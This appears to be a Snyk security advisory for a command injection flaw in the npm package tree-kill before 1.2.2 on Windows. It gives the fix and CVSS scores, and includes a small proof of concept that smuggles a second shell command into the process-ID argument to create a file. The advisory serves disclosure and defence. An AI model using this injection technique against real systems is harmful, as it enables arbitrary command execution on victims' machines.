<p>Upgrade <code>tree-kill</code> to version 1.2.2 or higher.</p>

Command Injection Affecting tree-kill package, versions <1.2.2

Threat Intelligence

Proof of concept

0.4% (75^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID SNYK-JS-TREEKILL-536781
published 5 Dec 2019
disclosed 4 Dec 2019
credit mik317

Report a new vulnerability Found a mistake?

Introduced: 4 Dec 2019

CVE-2019-15598 Open this link in a new tab CVE-2019-15599 Open this link in a new tab CWE-78 Open this link in a new tab

How to fix?

Upgrade tree-kill to version 1.2.2 or higher.

Overview

tree-kill is a package to kill all processes in the process tree, including the root process.

Affected versions of this package are vulnerable to Command Injection. User input is concatenated with a command within tree-kill and treekill that will be executed without any check.

Note: This vulnerability is only applicable if the package is used on a Windows operating system.

PoC by mik317

Create this POC file

//poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');

Execute the following commands in another terminal:

npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js #  Run the PoC
dir # Now *HACKED.txt* exists :)

A new file called HACKED.txt will be created, containing the HACKED string

References

CVSS Scores

version 3.1

Attack Vector (AV)

Local
Attack Complexity (AC)

High
Privileges Required (PR)

Low
User Interaction (UI)

None

Scope (S)

Unchanged

Confidentiality (C)

High
Integrity (I)

High
Availability (A)

High